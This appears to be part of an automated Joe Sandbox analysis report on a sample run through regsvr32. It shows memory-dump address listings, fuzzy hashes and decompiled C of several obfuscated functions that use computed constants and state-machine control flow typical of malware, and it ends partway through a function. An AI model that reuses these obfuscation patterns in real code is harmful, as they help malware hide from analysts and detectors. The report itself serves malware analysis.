                                                                                                                0x001a9631
                                                                                                                0x001a9636
                                                                                                                0x001a963b
                                                                                                                0x001a9643
                                                                                                                0x001a964b
                                                                                                                0x001a9653
                                                                                                                0x001a9658
                                                                                                                0x001a9660
                                                                                                                0x001a9668
                                                                                                                0x001a9670
                                                                                                                0x001a9678
                                                                                                                0x001a9680
                                                                                                                0x001a9688
                                                                                                                0x001a9690
                                                                                                                0x001a9695
                                                                                                                0x001a969d
                                                                                                                0x001a96a5
                                                                                                                0x001a96b0
                                                                                                                0x001a96bb
                                                                                                                0x001a96c6
                                                                                                                0x001a96ce
                                                                                                                0x001a96d3
                                                                                                                0x001a96db
                                                                                                                0x001a96e0
                                                                                                                0x001a96e8
                                                                                                                0x001a96f5
                                                                                                                0x001a96fe
                                                                                                                0x001a9707
                                                                                                                0x001a970b
                                                                                                                0x001a9713
                                                                                                                0x001a971b
                                                                                                                0x001a9729
                                                                                                                0x001a972d
                                                                                                                0x001a9735
                                                                                                                0x001a973d
                                                                                                                0x001a9745
                                                                                                                0x001a974a
                                                                                                                0x001a9752
                                                                                                                0x001a975a
                                                                                                                0x001a9762
                                                                                                                0x001a976c
                                                                                                                0x001a9774
                                                                                                                0x001a9783
                                                                                                                0x001a9786
                                                                                                                0x001a978a
                                                                                                                0x001a9792
                                                                                                                0x001a97a2
                                                                                                                0x001a97a6
                                                                                                                0x001a97ae
                                                                                                                0x001a97b6
                                                                                                                0x001a97be
                                                                                                                0x001a97c6
                                                                                                                0x001a97ce
                                                                                                                0x001a97d9
                                                                                                                0x001a97e4
                                                                                                                0x001a97ef
                                                                                                                0x001a97f7
                                                                                                                0x001a97ff
                                                                                                                0x001a9807
                                                                                                                0x001a980f
                                                                                                                0x001a9817
                                                                                                                0x001a981f
                                                                                                                0x001a9827
                                                                                                                0x001a982f
                                                                                                                0x001a9837
                                                                                                                0x001a983c
                                                                                                                0x001a9849
                                                                                                                0x001a984c
                                                                                                                0x001a9850
                                                                                                                0x001a9858
                                                                                                                0x001a9860
                                                                                                                0x001a9868
                                                                                                                0x001a9870
                                                                                                                0x001a9878
                                                                                                                0x001a9880
                                                                                                                0x001a9888
                                                                                                                0x001a9890
                                                                                                                0x001a9898
                                                                                                                0x001a98a0
                                                                                                                0x001a98a8
                                                                                                                0x001a98b2
                                                                                                                0x001a98b6
                                                                                                                0x001a98be
                                                                                                                0x001a98cb
                                                                                                                0x001a98cf
                                                                                                                0x001a98d7
                                                                                                                0x001a98df
                                                                                                                0x001a98e7
                                                                                                                0x001a98f7
                                                                                                                0x001a98ff
                                                                                                                0x001a9904
                                                                                                                0x001a990a
                                                                                                                0x001a9912
                                                                                                                0x001a991e
                                                                                                                0x001a9921
                                                                                                                0x001a992a
                                                                                                                0x001a992e
                                                                                                                0x001a9936
                                                                                                                0x001a993e
                                                                                                                0x001a9946
                                                                                                                0x001a9955
                                                                                                                0x001a9959
                                                                                                                0x001a9961
                                                                                                                0x001a9969
                                                                                                                0x001a9971
                                                                                                                0x001a9976
                                                                                                                0x001a997e
                                                                                                                0x001a9986
                                                                                                                0x001a998e
                                                                                                                0x001a9993
                                                                                                                0x001a999b
                                                                                                                0x001a99a9
                                                                                                                0x001a9aae
                                                                                                                0x00000000
                                                                                                                0x001a99af
                                                                                                                0x001a99af
                                                                                                                0x001a99b1
                                                                                                                0x001a9ae1
                                                                                                                0x001a9ae1
                                                                                                                0x001a9ae7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a99b7
                                                                                                                0x001a99cc
                                                                                                                0x001a99fd
                                                                                                                0x001a9a08
                                                                                                                0x001a9a0d
                                                                                                                0x001a9a14
                                                                                                                0x001a9a19
                                                                                                                0x001a9a20
                                                                                                                0x001a9a5d
                                                                                                                0x001a9a77
                                                                                                                0x001a9a85
                                                                                                                0x001a9a9b
                                                                                                                0x001a9aa0
                                                                                                                0x001a9aa5
                                                                                                                0x001a9aa7
                                                                                                                0x00000000
                                                                                                                0x001a9aa7
                                                                                                                0x001a9aa5
                                                                                                                0x001a99b1
                                                                                                                0x001a9af7
                                                                                                                0x001a9af7
                                                                                                                0x001a9ac0
                                                                                                                0x001a9acc
                                                                                                                0x001a9ad4
                                                                                                                0x001a9ad9
                                                                                                                0x001a9adc
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: A[$faBu$|8{T$)$
                                                                                                                • API String ID: 0-2976587679
                                                                                                                • Opcode ID: 3311ce99aab6cd131eebbf9dabdcf633d60a79743c4c43e347978b53476d1ce8
                                                                                                                • Instruction ID: 3738499f8303132e59d895f8b7af3de8739636016f93dbdc8f7cb83b8e162dfb
                                                                                                                • Opcode Fuzzy Hash: 3311ce99aab6cd131eebbf9dabdcf633d60a79743c4c43e347978b53476d1ce8
                                                                                                                • Instruction Fuzzy Hash: 23D111725083809FD368CF25C58AA4BFBF1FBC5758F108A1DF2A996260D7B58949CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001AA9CF Relevance: 5.2, Strings: 4, Instructions: 221COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001AA9CF() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _t199;
				signed int _t202;
				intOrPtr _t206;
				intOrPtr _t209;
				void* _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				intOrPtr _t221;
				void* _t243;
				char _t247;
				void* _t248;
				void* _t250;

				_v72 = 0xb444e2;
				_t212 = 0x67;
				_v72 = _v72 / _t212;
				_v72 = _v72 | 0x87c450fb;
				_t210 = 0;
				_v72 = _v72 + 0xffff808c;
				_t243 = 0x9728066;
				_v72 = _v72 ^ 0x87c57708;
				_v56 = 0xa1b977;
				_t213 = 0x2e;
				_v56 = _v56 / _t213;
				_v56 = _v56 + 0xffff53e5;
				_v56 = _v56 ^ 0x000dc799;
				_v36 = 0x531716;
				_v36 = _v36 + 0x222c;
				_v36 = _v36 ^ 0x0055b68d;
				_v40 = 0xe49ee6;
				_t214 = 0x5d;
				_v40 = _v40 * 0x78;
				_v40 = _v40 ^ 0x6b26598f;
				_v76 = 0x9798c2;
				_v76 = _v76 ^ 0xa2ba9d5b;
				_v76 = _v76 >> 1;
				_v76 = _v76 * 0x4d;
				_v76 = _v76 ^ 0x63c2c166;
				_v80 = 0x9fbabe;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 << 0xb;
				_v80 = _v80 * 0x6f;
				_v80 = _v80 ^ 0x4546ef9b;
				_v84 = 0x66afc1;
				_v84 = _v84 | 0xddecfcfd;
				_v84 = _v84 / _t214;
				_v84 = _v84 ^ 0x026206d6;
				_v60 = 0xc7aae5;
				_t215 = 0x2b;
				_v60 = _v60 / _t215;
				_v60 = _v60 + 0xffff183d;
				_v60 = _v60 ^ 0x00004396;
				_v44 = 0x703f20;
				_v44 = _v44 >> 5;
				_v44 = _v44 ^ 0x000f90eb;
				_v48 = 0x3ae1ef;
				_v48 = _v48 << 4;
				_v48 = _v48 ^ 0x03a95a41;
				_v88 = 0x8f3cbe;
				_v88 = _v88 | 0x844d8b7c;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 << 0xd;
				_v88 = _v88 ^ 0x2132a262;
				_v92 = 0x642638;
				_t95 =  &_v92; // 0x642638
				_v92 =  *_t95 * 0x50;
				_v92 = _v92 + 0xffffd80f;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x4bc44590;
				_v52 = 0x2b761f;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x2b7a0fc6;
				_v64 = 0x37f3d;
				_t216 = 0x55;
				_v64 = _v64 / _t216;
				_v64 = _v64 | 0xee4ace4d;
				_v64 = _v64 ^ 0xee4a59da;
				_v96 = 0xa0b3bf;
				_v96 = _v96 ^ 0x84ee222b;
				_v96 = _v96 << 1;
				_t217 = 0x14;
				_v96 = _v96 / _t217;
				_v96 = _v96 ^ 0x0063a113;
				_v68 = 0xad56e2;
				_v68 = _v68 + 0xffffe42a;
				_v68 = _v68 * 0x21;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 ^ 0x000ff2b1;
				_v32 = 0x44b560;
				_v32 = _v32 | 0xc129e094;
				_v32 = _v32 ^ 0xc1602592;
				_t242 = _v28;
				_t247 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t250 = _t243 - 0x9728066;
						if(_t250 > 0) {
							break;
						}
						if(_t250 == 0) {
							_t243 = 0xb487bad;
							continue;
						}
						if(_t243 == 0x343dbaf) {
							_t217 = _v56;
							_t199 = E001B2657(_v56, _v36,  &_v28, _t247, _v40);
							_t242 = _t199;
							_t248 = _t248 + 0xc;
							if(_t199 == 0) {
								goto L22;
							}
							_t243 = 0xe79433e;
							continue;
						}
						if(_t243 == 0x39a7551) {
							_t202 = E001BA683(_v60,  &_v24, _v44,  &_v16);
							asm("sbb esi, esi");
							_pop(_t217);
							_t243 = ( ~_t202 & 0xfe42ae62) + 0x69468b2;
							continue;
						}
						if(_t243 == 0x4d71714) {
							_t221 =  *0x1c4c10; // 0x67d820
							_t157 = _t221 + 0x20c; // 0x75004c
							E001C0DE9(_t157, _v12, _v48, _v88, _v92, _v8 + 1, _v52);
							_t206 =  *0x1c4c10; // 0x67d820
							_t217 = _v16;
							_t248 = _t248 + 0x14;
							_t210 = 1;
							_t243 = 0x69468b2;
							 *(_t206 + 0x424) = _v16;
							continue;
						}
						if(_t243 != 0x69468b2) {
							goto L21;
						} else {
							E001B17D2(_v64, _v96, _v24);
							_pop(_t217);
							_t243 = 0x986f6e2;
							continue;
						}
					}
					if(_t243 == 0x986f6e2) {
						E001A7C7A(_v68, _t242, _v32);
						_pop(_t217);
						_t243 = 0xb70149b;
						goto L21;
					}
					if(_t243 == 0xb487bad) {
						_t247 = E001B3E11(_t217);
						_t243 = 0x343dbaf;
						goto L1;
					}
					if(_t243 != 0xe79433e) {
						goto L21;
					}
					_t243 = 0x986f6e2;
					if(_v28 > 2) {
						_t217 = _v76;
						_t209 = E001A22F7(_v76, _v80,  *((intOrPtr*)(_t242 + 8)), _v84,  &_v20);
						_t248 = _t248 + 0xc;
						_v24 = _t209;
						if(_t209 != 0) {
							_t243 = 0x39a7551;
						}
					}
					goto L1;
					L21:
				} while (_t243 != 0xb70149b);
				L22:
				return _t210;
			}









































                                                                                                                0x001aa9d2
                                                                                                                0x001aa9e6
                                                                                                                0x001aa9eb
                                                                                                                0x001aa9f1
                                                                                                                0x001aa9f9
                                                                                                                0x001aa9fb
                                                                                                                0x001aaa03
                                                                                                                0x001aaa08
                                                                                                                0x001aaa10
                                                                                                                0x001aaa1c
                                                                                                                0x001aaa21
                                                                                                                0x001aaa27
                                                                                                                0x001aaa2f
                                                                                                                0x001aaa37
                                                                                                                0x001aaa3f
                                                                                                                0x001aaa47
                                                                                                                0x001aaa4f
                                                                                                                0x001aaa5c
                                                                                                                0x001aaa5f
                                                                                                                0x001aaa63
                                                                                                                0x001aaa6b
                                                                                                                0x001aaa73
                                                                                                                0x001aaa7b
                                                                                                                0x001aaa84
                                                                                                                0x001aaa88
                                                                                                                0x001aaa90
                                                                                                                0x001aaa98
                                                                                                                0x001aaa9d
                                                                                                                0x001aaaa7
                                                                                                                0x001aaaab
                                                                                                                0x001aaab3
                                                                                                                0x001aaabb
                                                                                                                0x001aaacb
                                                                                                                0x001aaacf
                                                                                                                0x001aaad7
                                                                                                                0x001aaae3
                                                                                                                0x001aaae6
                                                                                                                0x001aaaea
                                                                                                                0x001aaaf2
                                                                                                                0x001aaafa
                                                                                                                0x001aab02
                                                                                                                0x001aab07
                                                                                                                0x001aab0f
                                                                                                                0x001aab17
                                                                                                                0x001aab1c
                                                                                                                0x001aab24
                                                                                                                0x001aab2c
                                                                                                                0x001aab34
                                                                                                                0x001aab39
                                                                                                                0x001aab3e
                                                                                                                0x001aab46
                                                                                                                0x001aab4e
                                                                                                                0x001aab53
                                                                                                                0x001aab57
                                                                                                                0x001aab5f
                                                                                                                0x001aab64
                                                                                                                0x001aab6c
                                                                                                                0x001aab74
                                                                                                                0x001aab79
                                                                                                                0x001aab83
                                                                                                                0x001aab91
                                                                                                                0x001aab96
                                                                                                                0x001aab9c
                                                                                                                0x001aaba4
                                                                                                                0x001aabac
                                                                                                                0x001aabb4
                                                                                                                0x001aabbc
                                                                                                                0x001aabc4
                                                                                                                0x001aabc7
                                                                                                                0x001aabcb
                                                                                                                0x001aabd3
                                                                                                                0x001aabdb
                                                                                                                0x001aabe8
                                                                                                                0x001aabec
                                                                                                                0x001aabf1
                                                                                                                0x001aabf9
                                                                                                                0x001aac01
                                                                                                                0x001aac09
                                                                                                                0x001aac11
                                                                                                                0x001aac15
                                                                                                                0x001aac15
                                                                                                                0x001aac19
                                                                                                                0x001aac19
                                                                                                                0x001aac19
                                                                                                                0x001aac19
                                                                                                                0x001aac1f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001aac25
                                                                                                                0x001aad13
                                                                                                                0x00000000
                                                                                                                0x001aad13
                                                                                                                0x001aac31
                                                                                                                0x001aacf1
                                                                                                                0x001aacf7
                                                                                                                0x001aacfc
                                                                                                                0x001aacfe
                                                                                                                0x001aad03
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001aad09
                                                                                                                0x00000000
                                                                                                                0x001aad09
                                                                                                                0x001aac3d
                                                                                                                0x001aacc7
                                                                                                                0x001aacd1
                                                                                                                0x001aacd9
                                                                                                                0x001aacda
                                                                                                                0x00000000
                                                                                                                0x001aacda
                                                                                                                0x001aac45
                                                                                                                0x001aac82
                                                                                                                0x001aac8c
                                                                                                                0x001aac92
                                                                                                                0x001aac97
                                                                                                                0x001aac9e
                                                                                                                0x001aaca2
                                                                                                                0x001aaca5
                                                                                                                0x001aaca6
                                                                                                                0x001aacab
                                                                                                                0x00000000
                                                                                                                0x001aacab
                                                                                                                0x001aac4d
                                                                                                                0x00000000
                                                                                                                0x001aac53
                                                                                                                0x001aac5f
                                                                                                                0x001aac64
                                                                                                                0x001aac65
                                                                                                                0x00000000
                                                                                                                0x001aac65
                                                                                                                0x001aac4d
                                                                                                                0x001aad23
                                                                                                                0x001aad96
                                                                                                                0x001aad9b
                                                                                                                0x001aad9c
                                                                                                                0x00000000
                                                                                                                0x001aad9c
                                                                                                                0x001aad2b
                                                                                                                0x001aad80
                                                                                                                0x001aad82
                                                                                                                0x00000000
                                                                                                                0x001aad82
                                                                                                                0x001aad33
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001aad3a
                                                                                                                0x001aad3f
                                                                                                                0x001aad55
                                                                                                                0x001aad59
                                                                                                                0x001aad5e
                                                                                                                0x001aad61
                                                                                                                0x001aad67
                                                                                                                0x001aad6d
                                                                                                                0x001aad6d
                                                                                                                0x001aad67
                                                                                                                0x00000000
                                                                                                                0x001aada1
                                                                                                                0x001aada1
                                                                                                                0x001aadb0
                                                                                                                0x001aadb6

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ?p$,"$8&d$:
                                                                                                                • API String ID: 0-3128282930
                                                                                                                • Opcode ID: 4b8bb3c63d40efda018924496be4d3e7b5e8b26b2aa730cab0ecaa13329d48e9
                                                                                                                • Instruction ID: 2ebfb77d0acdd5abf7b9865f20f592f3d6af1bbf3069b867873d640915b0fccc
                                                                                                                • Opcode Fuzzy Hash: 4b8bb3c63d40efda018924496be4d3e7b5e8b26b2aa730cab0ecaa13329d48e9
                                                                                                                • Instruction Fuzzy Hash: E6A152329083409FC318CF64D48981BFBE1BBC5768F50492EF99A96220D3B6D949CB83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A1A5F Relevance: 5.2, Strings: 4, Instructions: 176COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001A1A5F(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t168;
				intOrPtr _t169;
				intOrPtr _t173;
				void* _t174;
				signed int _t176;
				void* _t192;
				void* _t193;
				signed int* _t196;
				signed int* _t197;

				_t196 =  &_v76;
				_v24 = 0xc0bffa;
				_v24 = _v24 * 0x6b;
				_t192 = __edx;
				_v24 = _v24 ^ 0x5090a1dc;
				_v52 = 0x12341a;
				_t174 = __ecx;
				_v52 = _v52 | 0xd6995a37;
				_t193 = 0x6ac6f9c;
				_v52 = _v52 + 0xffffd59f;
				_v52 = _v52 ^ 0xd698e1d8;
				_v28 = 0xd78d99;
				_v28 = _v28 | 0xd5b816ad;
				_v28 = _v28 ^ 0xd5f1ead7;
				_v32 = 0x4c8107;
				_t176 = 0x4d;
				_v32 = _v32 * 0x49;
				_v32 = _v32 ^ 0x15dd2280;
				_v48 = 0xe3ce4e;
				_v48 = _v48 ^ 0x2cd09c59;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x5862d5b8;
				_v20 = 0xbf1f42;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xc7dae4f1;
				_v64 = 0x587d15;
				_v64 = _v64 + 0x45c5;
				_v64 = _v64 | 0x045a514e;
				_v64 = _v64 + 0x1125;
				_v64 = _v64 ^ 0x04502ba8;
				_v16 = 0x4b70a;
				_v16 = _v16 * 0x57;
				_v16 = _v16 ^ 0x019ef5b9;
				_v44 = 0x31a52e;
				_v44 = _v44 + 0xffff693c;
				_v44 = _v44 / _t176;
				_v44 = _v44 ^ 0x000e7025;
				_v36 = 0xe858;
				_v36 = _v36 ^ 0x8be47117;
				_v36 = _v36 ^ 0x8bef38db;
				_v68 = 0xae7668;
				_v68 = _v68 + 0x1d8d;
				_v68 = _v68 >> 1;
				_t177 = 0x63;
				_v68 = _v68 * 0x4a;
				_v68 = _v68 ^ 0x1933910c;
				_v72 = 0x1e14fa;
				_v72 = _v72 << 1;
				_v72 = _v72 >> 0xe;
				_v72 = _v72 | 0x07c13180;
				_v72 = _v72 ^ 0x07c3a224;
				_v76 = 0xcd8842;
				_v76 = _v76 * 0x31;
				_v76 = _v76 | 0xd2f5f7fa;
				_v76 = _v76 ^ 0xf7f93cba;
				_v60 = 0x492c49;
				_v60 = _v60 + 0xffffce5e;
				_v60 = _v60 ^ 0x8bbf0f33;
				_v60 = _v60 + 0x943a;
				_v60 = _v60 ^ 0x8bf931c1;
				_v8 = 0xeced47;
				_t100 =  &_v8; // 0xeced47
				_v8 =  *_t100 / _t177;
				_v8 = _v8 ^ 0x0009a769;
				_v40 = 0x85a946;
				_v40 = _v40 ^ 0xe669efc2;
				_v40 = _v40 ^ 0x2fecdf48;
				_v40 = _v40 ^ 0xc90240a9;
				_v12 = 0x3b7c7e;
				_v12 = _v12 ^ 0xb84d48c3;
				_v12 = _v12 ^ 0xb87207eb;
				_v56 = 0xadac2a;
				_v56 = _v56 << 1;
				_v56 = _v56 + 0xffff35ec;
				_v56 = _v56 + 0x82ef;
				_v56 = _v56 ^ 0x0153125b;
				_v4 = 0xb1ab26;
				_v4 = _v4 ^ 0x53794212;
				_v4 = _v4 ^ 0x53c9d93c;
				while(1) {
					L1:
					_t168 = 0x2905f39;
					do {
						while(_t193 != _t168) {
							if(_t193 == 0x6ac6f9c) {
								_t193 = 0x6fd6f86;
								continue;
							} else {
								if(_t193 == 0x6fd6f86) {
									_push(_v32);
									_t169 = E001B3E89(_v24, _v52, __eflags, _v28, _t177, _t174);
									_t197 =  &(_t196[4]);
									 *((intOrPtr*)(_t192 + 0x14)) = _t169;
									__eflags = _t169;
									if(_t169 != 0) {
										E001B9954(_t169, _t169, _v48, _v20);
										_push( *((intOrPtr*)(_t192 + 0x14)));
										_push(_v44);
										_t177 = _v64;
										E001A7013(_v64, _v16);
										_t196 =  &(_t197[4]);
										_t193 = 0xe0809d9;
										goto L1;
									}
								} else {
									if(_t193 == 0xabeb3a7) {
										return E001C1BE6(_v56,  *((intOrPtr*)(_t192 + 0x14)), _v4);
									}
									if(_t193 != 0xe0809d9) {
										goto L13;
									} else {
										_t177 = _v36;
										_t173 = E001B6028(_v36, _v68, _v72, _v76,  *((intOrPtr*)(_t192 + 0x14)));
										_t196 =  &(_t196[3]);
										 *((intOrPtr*)(_t192 + 0xc)) = _t173;
										_t168 = 0x2905f39;
										_t193 =  !=  ? 0x2905f39 : 0xabeb3a7;
										continue;
									}
									L17:
								}
							}
							L16:
							return _t169;
							goto L17;
						}
						_t169 = E001B0231(_t192, _v60, _t192, E001BF7F4, _t192, _t177, _v8, _v40, _v12);
						_t196 =  &(_t196[8]);
						 *((intOrPtr*)(_t192 + 4)) = _t169;
						__eflags = _t169;
						if(_t169 == 0) {
							_t193 = 0xabeb3a7;
							_t168 = 0x2905f39;
							goto L13;
						}
						goto L16;
						L13:
						__eflags = _t193 - 0x5387d9c;
					} while (__eflags != 0);
					return _t168;
				}
			}































                                                                                                                0x001a1a5f
                                                                                                                0x001a1a62
                                                                                                                0x001a1a73
                                                                                                                0x001a1a77
                                                                                                                0x001a1a79
                                                                                                                0x001a1a83
                                                                                                                0x001a1a8b
                                                                                                                0x001a1a8d
                                                                                                                0x001a1a95
                                                                                                                0x001a1a9a
                                                                                                                0x001a1aa2
                                                                                                                0x001a1aaa
                                                                                                                0x001a1ab2
                                                                                                                0x001a1aba
                                                                                                                0x001a1ac2
                                                                                                                0x001a1ad1
                                                                                                                0x001a1ad4
                                                                                                                0x001a1ad8
                                                                                                                0x001a1ae0
                                                                                                                0x001a1ae8
                                                                                                                0x001a1af0
                                                                                                                0x001a1af4
                                                                                                                0x001a1afc
                                                                                                                0x001a1b04
                                                                                                                0x001a1b09
                                                                                                                0x001a1b11
                                                                                                                0x001a1b19
                                                                                                                0x001a1b21
                                                                                                                0x001a1b29
                                                                                                                0x001a1b31
                                                                                                                0x001a1b39
                                                                                                                0x001a1b46
                                                                                                                0x001a1b4a
                                                                                                                0x001a1b52
                                                                                                                0x001a1b5a
                                                                                                                0x001a1b6a
                                                                                                                0x001a1b6e
                                                                                                                0x001a1b76
                                                                                                                0x001a1b7e
                                                                                                                0x001a1b86
                                                                                                                0x001a1b8e
                                                                                                                0x001a1b96
                                                                                                                0x001a1b9e
                                                                                                                0x001a1ba7
                                                                                                                0x001a1ba8
                                                                                                                0x001a1bac
                                                                                                                0x001a1bb4
                                                                                                                0x001a1bbc
                                                                                                                0x001a1bc0
                                                                                                                0x001a1bc5
                                                                                                                0x001a1bcd
                                                                                                                0x001a1bd5
                                                                                                                0x001a1be2
                                                                                                                0x001a1be6
                                                                                                                0x001a1bee
                                                                                                                0x001a1bf6
                                                                                                                0x001a1bfe
                                                                                                                0x001a1c06
                                                                                                                0x001a1c0e
                                                                                                                0x001a1c16
                                                                                                                0x001a1c1e
                                                                                                                0x001a1c26
                                                                                                                0x001a1c2c
                                                                                                                0x001a1c30
                                                                                                                0x001a1c38
                                                                                                                0x001a1c40
                                                                                                                0x001a1c48
                                                                                                                0x001a1c55
                                                                                                                0x001a1c5d
                                                                                                                0x001a1c65
                                                                                                                0x001a1c6d
                                                                                                                0x001a1c75
                                                                                                                0x001a1c7d
                                                                                                                0x001a1c81
                                                                                                                0x001a1c89
                                                                                                                0x001a1c91
                                                                                                                0x001a1c99
                                                                                                                0x001a1ca1
                                                                                                                0x001a1ca9
                                                                                                                0x001a1cb1
                                                                                                                0x001a1cb1
                                                                                                                0x001a1cb1
                                                                                                                0x001a1cb6
                                                                                                                0x001a1cb6
                                                                                                                0x001a1cc4
                                                                                                                0x001a1d69
                                                                                                                0x00000000
                                                                                                                0x001a1cca
                                                                                                                0x001a1cd0
                                                                                                                0x001a1d12
                                                                                                                0x001a1d24
                                                                                                                0x001a1d29
                                                                                                                0x001a1d2c
                                                                                                                0x001a1d2f
                                                                                                                0x001a1d31
                                                                                                                0x001a1d43
                                                                                                                0x001a1d48
                                                                                                                0x001a1d4b
                                                                                                                0x001a1d53
                                                                                                                0x001a1d57
                                                                                                                0x001a1d5c
                                                                                                                0x001a1d5f
                                                                                                                0x00000000
                                                                                                                0x001a1d5f
                                                                                                                0x001a1cd2
                                                                                                                0x001a1cd4
                                                                                                                0x00000000
                                                                                                                0x001a1dc1
                                                                                                                0x001a1ce0
                                                                                                                0x00000000
                                                                                                                0x001a1ce6
                                                                                                                0x001a1cf5
                                                                                                                0x001a1cf9
                                                                                                                0x001a1cfe
                                                                                                                0x001a1d01
                                                                                                                0x001a1d08
                                                                                                                0x001a1d0d
                                                                                                                0x00000000
                                                                                                                0x001a1d0d
                                                                                                                0x00000000
                                                                                                                0x001a1ce0
                                                                                                                0x001a1cd0
                                                                                                                0x001a1dc9
                                                                                                                0x001a1dc9
                                                                                                                0x00000000
                                                                                                                0x001a1dc9
                                                                                                                0x001a1d8d
                                                                                                                0x001a1d92
                                                                                                                0x001a1d95
                                                                                                                0x001a1d98
                                                                                                                0x001a1d9a
                                                                                                                0x001a1d9c
                                                                                                                0x001a1d9e
                                                                                                                0x00000000
                                                                                                                0x001a1d9e
                                                                                                                0x00000000
                                                                                                                0x001a1da3
                                                                                                                0x001a1da3
                                                                                                                0x001a1da3
                                                                                                                0x00000000
                                                                                                                0x001a1cb6

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: G$I,I$X$~|;
                                                                                                                • API String ID: 0-2912738583
                                                                                                                • Opcode ID: cdc6cf6c770e798eeb27077ed1ff4c87a8a128bf93f5d5242897ff0df5aa2e14
                                                                                                                • Instruction ID: 61b8997097ce60b50fa16ea28c21642e8569f1e89821d937e237995a996313b8
                                                                                                                • Opcode Fuzzy Hash: cdc6cf6c770e798eeb27077ed1ff4c87a8a128bf93f5d5242897ff0df5aa2e14
                                                                                                                • Instruction Fuzzy Hash: C18130B5509381AFC398CF64C58A81BFBF1FB84718F405A1DF596A6260D3B5DA088B87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B7E3D Relevance: 5.2, Strings: 4, Instructions: 167COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E001B7E3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t152;
				void* _t165;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t182;
				void* _t198;
				void* _t199;
				signed int* _t202;

				_push(_a8);
				_t198 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t152);
				_v16 = 0x6cdeb9;
				_t202 =  &(( &_v68)[4]);
				_t199 = 0;
				_t182 = 0x673029;
				_t176 = 0x42;
				_v16 = _v16 / _t176;
				_v16 = _v16 ^ 0x0001a649;
				_v28 = 0x421dd1;
				_v28 = _v28 ^ 0x91db12c0;
				_v28 = _v28 << 4;
				_v28 = _v28 ^ 0x1990f111;
				_v20 = 0x91374a;
				_v20 = _v20 >> 0xc;
				_v20 = _v20 ^ 0x40000913;
				_v8 = 0xece2fd;
				_t177 = 7;
				_v8 = _v8 / _t177;
